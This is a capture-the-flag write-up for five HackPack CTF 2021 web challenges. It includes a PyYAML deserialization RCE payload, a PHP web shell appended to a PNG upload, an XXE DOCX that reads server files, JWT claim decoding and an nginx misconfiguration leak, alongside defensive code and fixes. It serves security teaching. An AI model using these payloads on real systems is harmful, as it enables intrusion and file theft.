All web challenges from HackPack CTF 2021.

"N"ot "G"am"I"ng a"N"ymore in "X"mas

Can you login as admin?
http://no-gaming-anymore-in-xmas.ctf2021.hackpack.club

...
	<span>Admin Login</span>
	<div>
		<input placeholder="Password"></input>
	</div>

	<form action="/" method="post">
		<button type="submit" value="Send Email" >Login</button>
		<input type="hidden" name="debug" value="0">
	</form> 
...

Make a POST request to / with debug=1 (the hidden form field) and the response contains some interesting feedback: the server's own nginx configuration.

Let me check again my nginx conf:
server {
    listen 80;
    server_name localhost;

    root /etc/nginx;
    index index.html;

    location /maybehereimportantstuff {
        try_files $uri $uri/ =404;
    }
}

Because root is /etc/nginx, the location /maybehereimportantstuff is served straight from /etc/nginx/maybehereimportantstuff on disk, and anything else under that directory (nginx.conf included) is reachable the same way, which is why a web root inside /etc is a misconfiguration in its own right. Execute curl https://no-gaming-anymore-in-xmas.ctf2021.hackpack.club/maybehereimportantstuff and get the flag.

Flag: flag{ng1nx_m1sconf1g_c4n_b3_h4rmful}


All about resetting

Who can guess my password or..
http://all-about-resetting.ctf2021.hackpack.club


<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<!DOCTYPE html>
<html lang="en">
<head>
	<title>Login V1</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">

</head>

<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<body>	
	<span class="login100-form-title">
		Member Login
	</span>

	<div>
		<input placeholder="Email">

		</input>
	</div>

	<div>
		<input placeholder="Password">

		</input>
	</div>
	
	<div class="container-login100-form-btn">
		<button class="login100-form-btn">
			Login
		</button>
	</div>
	
	<form action="/reset" method="post">
		<button type="submit" value="Send Email" >Forgot Password?</button>
	</form>
	
</body>
</html>

Press Forgot Password?, enter the email npantel@ncsu.edu from the HTML comment, and submit. We get a security question: What is your favorite type of governance?

Delete the session cookie, refresh, and get a new cookie. The cookie is a JWT; paste it into jwt.io and the decoded payload is

{
  "favoritegovernance": "kakistocracy",
  "favoriteteam": "olympiacos"
}

The server stored the answer to its own security question in the token's claims, and a JWT is signed, not encrypted, so anyone holding the cookie can read them. Type in kakistocracy as the answer, log in, and get the flag.
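What jwt.io does here is nothing more than base64url-decoding two segments; the signature never has to be checked to read the claims. The following is an added example (not the challenge's code): it decodes a token without a key, and also mints and verifies an HS256 token so that it runs offline. The claims are the ones from the writeup; the signing key is a placeholder, since the real server secret is unknown and never needed.

```python
import base64
import hashlib
import hmac
import json


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_jwt_unverified(token: str) -> dict:
    """Read header and payload the way jwt.io does: no key, no verification."""
    header, payload, signature = token.split(".")
    return {
        "header": json.loads(b64url_decode(header)),
        "payload": json.loads(b64url_decode(payload)),
        "signature": b64url_decode(signature),
    }


def make_hs256_jwt(payload: dict, key: bytes) -> str:
    """Constructed token so the example runs offline (stand-in for the server)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(p, separators=(",", ":")).encode())
        for p in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, key: bytes) -> bool:
    """What the server checks: integrity of the claims, not their secrecy."""
    signing_input, sig = token.rsplit(".", 1)
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


# Claims copied from the writeup; the key is hypothetical.
CHALLENGE_CLAIMS = {"favoritegovernance": "kakistocracy", "favoriteteam": "olympiacos"}
SERVER_KEY = b"hypothetical-server-secret"


def recover_reset_answer(token: str) -> str:
    """The signature is intact, but the answer sits in plaintext claims."""
    return decode_jwt_unverified(token)["payload"]["favoritegovernance"]


if __name__ == "__main__":
    token = make_hs256_jwt(CHALLENGE_CLAIMS, SERVER_KEY)
    print(token)
    print(recover_reset_answer(token))
```

A signed token is the right place for a user id or a reset-flow state marker, but never for the secret the flow is meant to test; the answer belongs server-side, and the token should only carry an opaque reset id that looks it up.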

Flag: flag{Wh4t_1s_th1s_gov3rn4nc3_!!!}


Yaml-2-Json

Checkout my useful tool to convert YAML to JSON format.
http://yaml-2-json.ctf2021.hackpack.club

From the hint we know the flag is located at /tmp/flag.txt.

The converter is probably a Python app built on PyYAML, so there may be a deserialization RCE: yaml.load() with the unsafe Loader (the default before PyYAML 5.1) constructs arbitrary Python objects from !!python/ tags, and !!python/object/apply calls any importable callable with attacker-chosen arguments.

Make the request

POST / HTTP/1.1
Host: yaml-2-json.ctf2021.hackpack.club
Connection: close
Content-Length: 76
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://yaml-2-json.ctf2021.hackpack.club
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://yaml-2-json.ctf2021.hackpack.club/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _890f5=http://192.168.181.16:10993; premium=true

yaml=!!python/object/apply:subprocess.check_output [["cat","/tmp/flag.txt"]]
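To see the difference between the loader that makes this payload work and the one that stops it, here is an added example (not the challenge's source, which we never saw). It uses a harmless callable, os.getcwd, in place of subprocess.check_output, adds a tag check that can run before any parser is involved, and treats PyYAML as optional so the tag check still runs where the library is missing.

```python
import os
import re

try:
    import yaml  # PyYAML; optional here so the tag detector works without it
except ImportError:
    yaml = None

# Constructed inputs. The malicious one mirrors the writeup's payload shape with
# a harmless callable so the example can be run safely.
BENIGN_YAML = "name: test\nlist: [1, 2, 3]\n"
MALICIOUS_YAML = "!!python/object/apply:os.getcwd []\n"

# Any tag in PyYAML's python/ namespace lets the document choose the class or
# callable that gets built; none of them belong in user-supplied input.
DANGEROUS_TAG = re.compile(r"!!python/|!<tag:yaml\.org,2002:python/")


def has_dangerous_tag(doc: str) -> bool:
    """Cheap pre-check: reject python/ tags before the parser ever sees them."""
    return DANGEROUS_TAG.search(doc) is not None


def pyyaml_available() -> bool:
    return yaml is not None


def unsafe_convert(doc: str):
    """The vulnerable pattern. yaml.Loader builds arbitrary Python objects; it was
    also what a bare yaml.load(doc) used before PyYAML 5.1."""
    return yaml.load(doc, Loader=yaml.Loader)


def unsafe_convert_executes_code() -> bool:
    """True when loading MALICIOUS_YAML actually called os.getcwd()."""
    return unsafe_convert(MALICIOUS_YAML) == os.getcwd()


def safe_convert(doc: str):
    """The fix: safe_load only builds scalars, lists and dicts."""
    return yaml.safe_load(doc)


def safe_convert_rejects(doc: str) -> bool:
    """safe_load raises a ConstructorError (a YAMLError) on any python/ tag."""
    try:
        safe_convert(doc)
    except yaml.YAMLError:
        return True
    return False


if __name__ == "__main__" and pyyaml_available():
    print("unsafe:", unsafe_convert(MALICIOUS_YAML))
    print("safe rejects:", safe_convert_rejects(MALICIOUS_YAML))
```

Use safe_load (or SafeLoader) rather than FullLoader for untrusted input: FullLoader in PyYAML 5.1 through 5.3.1 had its own bypasses that still reached python/object tags.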

Flag: flag{Py_PyYaml_Yaml_Py}


Indead v1

Job posting website for security experts, pentesters and hackers.
http://indead-upload-avatar.ctf2021.hackpack.club

Take any PNG file and call it test.png.

Run

cp test.png exp.php
echo "<?php system(\$_GET['c']); ?>" >> exp.php

Upload exp.php. It is accepted, so the upload filter evidently checks the file's content (the PNG signature) rather than its extension, and the server stores it under very_long_directory_path and will execute it as PHP.

From the hint we know the flag is located at /var/www/flag.txt.

Accessing https://indead-upload-avatar.ctf2021.hackpack.club/very_long_directory_path/exp.php?c=cat%20/var/www/flag.txt gives us the flag.

Flag: flag{y3t_an0ther_file_uplo@d_vuln}


Indead v2

Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV.
http://indead-upload-cv.ctf2021.hackpack.club

For this challenge we can only upload DOCX files.

Create test.docx containing test1. Upload it, and the output is You CV content: test1.

So the server unzips the document, parses its XML and echoes the text back, which suggests an XXE vulnerability.

Unzip test.docx and edit word/document.xml.

Add on line 2 (after the XML declaration)

<!DOCTYPE test [<!ENTITY xxe SYSTEM 'file:///var/www/flag.txt'>]>

Edit line 3

Original
...<w:t>test1</w:t>...
to
...<w:t>&xxe;</w:t>...

Put all the extracted files in a folder tmp and rebuild the DOCX (which is just a ZIP archive) with

7z a malicious.zip ./tmp/*
mv malicious.zip malicious.docx

Upload malicious.docx, and the echoed CV content is the flag.
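The same document can be produced without the unzip/7z round trip, and the server side can be shown alongside it. This is an added example, not the challenge's code: it writes a minimal docx (only the three parts a converter that reads word/document.xml needs; a file saved by Word has more, which is why the writeup edits a real test.docx), plants the DOCTYPE on line 2 and the entity reference in w:t, and then implements the check a converter should run before parsing: refuse any XML part that carries a DOCTYPE at all.

```python
import io
import re
import zipfile

# Minimal package parts; constructed for this example.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>"""


def document_xml(body_text: str, doctype: str = "") -> str:
    """word/document.xml; a DOCTYPE must sit on line 2, after the declaration."""
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        + (doctype + "\n" if doctype else "")
        + '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        + "<w:body><w:p><w:r><w:t>" + body_text + "</w:t></w:r></w:p></w:body></w:document>"
    )


def build_docx(body_text: str, doctype: str = "") -> bytes:
    """A docx is a ZIP; [Content_Types].xml must be at the archive root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr("word/document.xml", document_xml(body_text, doctype))
    return buf.getvalue()


def build_xxe_docx(target: str = "file:///var/www/flag.txt") -> bytes:
    """The writeup's payload: an external entity whose expansion lands in w:t."""
    doctype = f"<!DOCTYPE test [<!ENTITY xxe SYSTEM '{target}'>]>"
    return build_docx("&xxe;", doctype)


def extract_document_xml(docx_bytes: bytes) -> str:
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read("word/document.xml").decode()


# Server side: OOXML parts never legitimately carry a DOCTYPE, so reject the
# whole upload if any XML part has one, whatever the XML parser's settings are.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.I)


def docx_has_doctype(docx_bytes: bytes) -> bool:
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return any(
            name.endswith((".xml", ".rels")) and DOCTYPE_RE.search(z.read(name)) is not None
            for name in z.namelist()
        )


if __name__ == "__main__":
    with open("malicious.docx", "wb") as f:
        f.write(build_xxe_docx())
    print("benign flagged:", docx_has_doctype(build_docx("test1")))
    print("malicious flagged:", docx_has_doctype(build_xxe_docx()))
```

The DOCTYPE pre-check is a belt-and-braces layer; the parser itself must still be configured not to resolve external entities or fetch external DTDs, since a converter that parses other XML formats will not always be able to reject DOCTYPEs outright.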

Flag: flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}